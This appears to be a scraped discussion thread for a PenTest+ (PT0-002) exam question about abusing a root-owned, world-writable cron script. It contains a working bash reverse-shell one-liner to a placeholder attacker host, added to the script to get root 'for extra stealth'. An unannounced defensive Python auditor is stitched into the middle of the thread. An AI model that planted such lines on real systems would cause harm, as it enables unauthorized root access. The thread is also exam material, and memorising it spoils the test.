In order to use privilege escalation, you must start a reverse shell first. Your current shell has low permissions. So yes, you will now attempt to escalate privileges by running:
echo "bash -i >& /dev/tcp/attacker_ip/4444 0>&1" >> /scripts/daily_log_backup.sh
You can execute this file now (or wait until it runs automatically for extra stealth because it's likely a daily cron job) to spawn a root shell.
You now know where to go to escalate privilege but you run the risk of the server shutting down on you.
First thing you are taught once you get into a system is to create a back door. So I believe reverse shell is the right answer.
B. Use privilege escalation
I agree with the other contributors who selected B and their explanations.
These are spelled out in order from left to right: rwxrwxrwx
r User Permissions Read
w User Permissions Write
x User Permissions Execute
r Group Permissions Read
w Group Permissions Write
x Group Permissions Execute
r Other Permissions Read
w Other Permissions Write
x Other Permissions Execute
User Permissions: The user that owns the file.
Group Permissions: The group the file belongs to.
Other Permissions: The other users, i.e., everyone else.
The file .scripts/daily_log_backup.sh has permissions set to 777, meaning that anyone can read, write, or execute the file. Since it's owned by the root user and the penetration tester has access to the system with a non-privileged account, this could be a potential avenue for privilege escalation.
In a penetration test, after finding such a file, the tester would likely want to explore it and see if it can be leveraged to gain higher privileges. This is often done by inserting malicious code or commands into the script if it's being executed with higher privileges, such as root in this case.
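A defender-side check for the misconfiguration described in the comment above, as an added example that is not part of the original thread: it walks a directory and reports regular files owned by a privileged uid that "other" can write, showing each mode in octal and as the rwxrwxrwx string. The function names, the `hardened_backup.sh` file and the 0750 mode are assumptions made for the illustration, and the demo uses the current uid in place of root so it runs unprivileged.

```python
import os
import stat
import tempfile

def describe_mode(mode):
    """Render the nine permission bits as the rwxrwxrwx string, read left to right."""
    return stat.filemode(mode)[1:]  # drop the leading file-type character

def is_risky(st, privileged_uid=0):
    """True for a regular file owned by the privileged account that 'other' can write."""
    return (stat.S_ISREG(st.st_mode)
            and st.st_uid == privileged_uid
            and bool(st.st_mode & stat.S_IWOTH))

def audit(root, privileged_uid=0):
    """Walk `root` and return (path, octal mode, rwx string) for each risky file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: report the entry itself, not a symlink target
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if is_risky(st, privileged_uid):
                perms = stat.S_IMODE(st.st_mode)
                findings.append((path, format(perms, "03o"), describe_mode(st.st_mode)))
    return sorted(findings)

def demo():
    """Constructed sample tree; the current uid stands in for root (assumption)."""
    with tempfile.TemporaryDirectory() as tmp:
        weak = os.path.join(tmp, "daily_log_backup.sh")   # mode 777, as in the question
        fixed = os.path.join(tmp, "hardened_backup.sh")   # hypothetical corrected copy
        for path, mode in ((weak, 0o777), (fixed, 0o750)):
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)  # chmod sets the mode exactly, regardless of umask
        return [(os.path.basename(p), o, s) for p, o, s in audit(tmp, os.getuid())]

if __name__ == "__main__":
    for row in demo():
        print(row)
```

Run against the directories that cron jobs execute from, with the default `privileged_uid=0`, to list scripts that need their write bit for "other" removed.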
The penetration tester can abuse this file configuration to do a lot of things involving privilege escalation. For sure, one of them could be setting a reverse shell in the file (that would probably be executed by a cron job), but it could also send commands to change file permissions, or change user permissions, etc. So in my opinion, the bigger picture here is to escalate the privileges.
So you escalate privilege and are all happy - what happens if the server is shut down?
I think it's best to have a back door first before looking at escalation. D is a better answer.
This file is NOT SUID executable. It can be used for a reverse shell.
Ref: https://null-byte.wonderhowto.com/how-to/hacking-macos-perform-privilege-escalation-part-1-file-permissions-abuse-0186331/
The correct answer is reverse shell.
To take advantage of the file /scripts/daily_log_backup.sh and use it to escalate privileges on the Linux system, the penetration tester can attempt to exploit a vulnerability in the script itself or in the interpreter that the script uses.
One way to exploit the script is to modify it by adding malicious code that will execute as root when the script runs. The tester can do this by first copying the script to a writeable directory using their non-privileged account. They can then modify the script by adding their own code that will give them a shell as root or allow them to escalate their privileges in another way.
PT0-002 Exam Questions
kinny4000 (2 months, 3 weeks ago)
Sebatian20 (5 months, 2 weeks ago)
PhillyCheese (9 months, 3 weeks ago)
solutionz (1 year, 2 months ago)
Leonidasss (1 year, 2 months ago)
864deb5 (9 months ago)
RAMI_PAL (1 year, 5 months ago)
matheusfmartins (1 year, 2 months ago)
Sebatian20 (5 months, 2 weeks ago)
RAMI_PAL (1 year, 5 months ago)
cy_analyst (1 year, 7 months ago)
[Removed] (1 year, 7 months ago)